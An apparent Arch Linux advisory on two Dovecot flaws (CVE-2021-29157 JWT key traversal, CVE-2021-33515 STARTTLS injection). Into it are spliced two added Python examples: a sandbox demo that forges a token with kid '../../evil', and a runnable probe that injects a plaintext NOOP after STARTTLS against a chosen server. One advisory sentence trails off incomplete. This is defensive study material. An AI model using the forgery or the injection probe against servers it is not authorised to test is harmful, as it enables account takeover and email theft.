[ASA-202106-56] dovecot: information disclosure
diabonas at archlinux.org
Thu Jun 24 16:20:51 UTC 2021
Arch Linux Security Advisory ASA-202106-56
Date : 2021-06-22
CVE-ID : CVE-2021-29157 CVE-2021-33515
Package : dovecot
Type : information disclosure
Remote : Yes
Link : https://security.archlinux.org/AVG-2087
The package dovecot before version 2.3.15-1 is vulnerable to
Upgrade to 2.3.15-1.
# pacman -Syu "dovecot>=2.3.15-1"
The problems have been fixed upstream in version 2.3.15.
CVE-2021-29157 can be mitigated by disabling local JWT validation in
oauth2, or using a different dict driver than fs:posix. No known
workaround exists for CVE-2021-33515.
- CVE-2021-29157 (information disclosure)
A security issue has been found in Dovecot before version 2.3.15. The
kid and azp fields of JWT tokens are not correctly escaped before they
are used to select the key that validates the token, so in some
configurations (local JWT validation in oauth2 with the fs:posix dict
driver) they can be used to point Dovecot at attacker controlled key
material. The attack requires the attacker to be able to write files to
the local disk. As a result, a local attacker can log in as any user and
access their emails.
- CVE-2021-33515 (information disclosure)
A security issue has been found in Dovecot before version 2.3.15. An
on-path attacker could inject plaintext commands ahead of the STARTTLS
negotiation that the server then executes after STARTTLS has completed
with the client, inside the TLS session. Only the SMTP submission
service is affected, and the attacker needs sending permissions on the
submission server (a valid username and password). As a result, an
attacker can potentially steal user credentials and emails.
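A model of the key-lookup bug class described for CVE-2021-29157, added here as an example and not Dovecot's own code. The directory layout <keydir>/<azp>/<kid>, the HS256-only verifier and the percent-escaping rule are assumptions for illustration; the advisory only states that kid and azp are not correctly escaped, that the fs:posix dict driver is affected, and that the attacker must be able to write a file to local disk. The constructed scenario stores the legitimate key under the key directory and an attacker-written key file outside it, then verifies a legitimate and a forged token with both the unescaped and the escaped lookup.

```python
"""Key lookup driven by unescaped JWT fields (CVE-2021-29157 bug class).

Added example, not Dovecot's code. The layout <keydir>/<azp>/<kid>, the
HS256-only verifier and the escaping rule are assumptions for illustration.
"""
import base64
import hashlib
import hmac
import json
import os
import re
import tempfile
from typing import Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, claims: dict, key: bytes) -> str:
    """Mint a compact JWS with HS256; used by the legitimate issuer and by the attacker alike."""
    parts = [b64url(json.dumps(p, separators=(",", ":")).encode()) for p in (header, claims)]
    signing_input = ".".join(parts)
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


SAFE_COMPONENT = re.compile(r"[^A-Za-z0-9_-]")


def escape_component(value: str) -> str:
    """Hardened form: percent-encode everything outside a safe charset so that
    '/', '..' or NUL in a token field can never name a different directory entry."""
    return SAFE_COMPONENT.sub(lambda m: "%%%02X" % ord(m.group()), value)


def lookup_key(keydir: str, azp: str, kid: str, escape: bool) -> Optional[bytes]:
    """Load the validation key for (azp, kid) from <keydir>/<azp>/<kid>.

    escape=False is the vulnerable behaviour: raw token fields become path
    components, so '../' in kid (or an absolute path) reaches any file on disk
    that the attacker was able to write.
    """
    if escape:
        azp, kid = escape_component(azp), escape_component(kid)
    path = os.path.join(keydir, azp, kid)
    if escape:
        # second layer: refuse anything that still resolves outside the key directory
        root = os.path.realpath(keydir) + os.sep
        if not os.path.realpath(path).startswith(root):
            return None
    try:
        with open(path, "rb") as f:
            return f.read()
    except OSError:
        return None


def verify_token(token: str, keydir: str, escape: bool) -> Optional[dict]:
    """Return the claims if the signature verifies under the looked-up key, else None."""
    try:
        h, c, s = token.split(".")
        header = json.loads(b64url_decode(h))
        claims = json.loads(b64url_decode(c))
    except ValueError:
        return None
    if header.get("alg") != "HS256":
        return None
    key = lookup_key(keydir, str(claims.get("azp", "")), str(header.get("kid", "")), escape)
    if key is None:
        return None
    expected = hmac.new(key, f"{h}.{c}".encode("ascii"), hashlib.sha256).digest()
    return claims if hmac.compare_digest(expected, b64url_decode(s)) else None


def demo() -> dict:
    """Constructed scenario: a local attacker who can write one file outside the
    key directory forges a token for another user. Returns what each verifier accepted."""
    with tempfile.TemporaryDirectory() as tmp:
        keydir = os.path.join(tmp, "keys")
        os.makedirs(os.path.join(keydir, "trusted-issuer"))
        issuer_key = os.urandom(32)
        with open(os.path.join(keydir, "trusted-issuer", "k1"), "wb") as f:
            f.write(issuer_key)
        attacker_key = b"attacker-controlled-key"
        with open(os.path.join(tmp, "evil"), "wb") as f:  # attacker-writable, outside keydir
            f.write(attacker_key)

        legit = sign_hs256({"alg": "HS256", "kid": "k1"},
                           {"azp": "trusted-issuer", "sub": "alice"}, issuer_key)
        forged = sign_hs256({"alg": "HS256", "kid": "../../evil"},  # walks out of keys/trusted-issuer/
                            {"azp": "trusted-issuer", "sub": "victim"}, attacker_key)
        return {
            "legit_vulnerable": verify_token(legit, keydir, escape=False) is not None,
            "legit_hardened": verify_token(legit, keydir, escape=True) is not None,
            "forged_vulnerable": verify_token(forged, keydir, escape=False),  # claims: accepted
            "forged_hardened": verify_token(forged, keydir, escape=True),  # None: rejected
        }


if __name__ == "__main__":
    print(demo())
```

The escaping alone already defeats the traversal, but the realpath containment check costs nothing and also catches symlinks placed inside the key directory, which is why both are kept in the hardened path.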
A remote authenticated attacker or a local attacker with write access
to the disk could disclose user credentials and emails.
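A probe for the bug class described above for CVE-2021-33515, added here as an example and not code from Dovecot or the advisory. It sends STARTTLS and a harmless NOOP in one plaintext write, then watches whether a reply arrives on the new TLS session before the client has sent anything encrypted: a server that still executes the leftover plaintext bytes after the handshake answers the NOOP, a fixed server stays silent. The host and port arguments, the EHLO name and the NOOP payload are assumptions; run it only against servers you are authorised to test.

```python
"""Probe an SMTP submission server for plaintext command injection across
STARTTLS, the bug class described for CVE-2021-33515.

Added example, not Dovecot's code. "STARTTLS" and a harmless NOOP are sent
in one plaintext write. A server that keeps the unencrypted bytes left in its
input buffer and executes them after the TLS handshake answers the NOOP over
the new TLS session before the client has sent anything encrypted; a fixed
server discards them.
"""
import socket
import ssl
from typing import Optional, Tuple

INJECTED_COMMAND = b"NOOP"  # harmless stand-in for the commands an attacker would inject
PROBE_NAME = b"starttls-probe.invalid"  # assumed EHLO name


def build_injection_payload(injected: bytes = INJECTED_COMMAND) -> bytes:
    """STARTTLS plus a trailing plaintext command, delivered in a single write."""
    return b"STARTTLS\r\n" + injected + b"\r\n"


def split_reply(buf: bytes) -> Tuple[Optional[bytes], bytes]:
    """Split one complete SMTP reply off the front of buf.

    Returns (reply, rest); reply is None while the buffer is still incomplete.
    A reply ends at the first line whose 4th character is not '-' ("250 ok");
    continuation lines look like "250-SIZE 10240000".
    """
    pos = 0
    while True:
        end = buf.find(b"\r\n", pos)
        if end < 0:
            return None, buf
        line = buf[pos:end]
        pos = end + 2
        if len(line) >= 3 and line[:3].isdigit() and line[3:4] != b"-":
            return buf[:pos], buf[pos:]


def reply_code(reply: bytes) -> int:
    return int(reply[:3])


def recv_reply(sock, initial: bytes = b"") -> bytes:
    """Read exactly one reply, a byte at a time, so nothing past it is pulled
    out of the kernel buffer before the socket is handed over to TLS."""
    buf = initial
    while True:
        reply, _rest = split_reply(buf)
        if reply is not None:
            return reply
        chunk = sock.recv(1)
        if not chunk:
            raise ConnectionError("connection closed mid-reply")
        buf += chunk


def probe(host: str, port: int = 587, timeout: float = 5.0, verify: bool = True) -> dict:
    """Return {'vulnerable': bool, 'detail': str} for one submission server."""
    ctx = ssl.create_default_context()
    if not verify:  # lab servers with self-signed certificates
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        greeting = recv_reply(sock)
        if reply_code(greeting) != 220:
            return {"vulnerable": False,
                    "detail": "unexpected greeting: " + greeting.decode(errors="replace").strip()}
        sock.sendall(b"EHLO " + PROBE_NAME + b"\r\n")
        recv_reply(sock)
        sock.sendall(build_injection_payload())
        ready = recv_reply(sock)  # the "220 ... ready to start TLS" reply to STARTTLS only
        if reply_code(ready) != 220:
            return {"vulnerable": False,
                    "detail": "STARTTLS refused: " + ready.decode(errors="replace").strip()}
        sock = ctx.wrap_socket(sock, server_hostname=host)  # the plaintext socket object is consumed here
        sock.settimeout(timeout)
        try:
            first = sock.recv(1)  # nothing sent over TLS yet, so any byte here answers the injected NOOP
        except socket.timeout:
            first = b""
        if first:
            leaked = recv_reply(sock, initial=first)
            sock.sendall(b"QUIT\r\n")
            return {"vulnerable": True,
                    "detail": "reply to the plaintext-injected command arrived inside TLS: "
                              + leaked.decode(errors="replace").strip()}
        sock.sendall(b"EHLO " + PROBE_NAME + b"\r\n")  # confirm the TLS channel itself works
        ehlo = recv_reply(sock)
        sock.sendall(b"QUIT\r\n")
        return {"vulnerable": False,
                "detail": "injected command discarded; EHLO inside TLS got %d" % reply_code(ehlo)}
    finally:
        sock.close()


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 587))
```

Usage: `python3 probe.py mail.example.org 587`. Reading one byte at a time before the handshake matters: a buffered reader could pull the server's first TLS bytes into userspace and break the wrap, and reading only one reply after the payload is what makes an unsolicited reply inside TLS unambiguous.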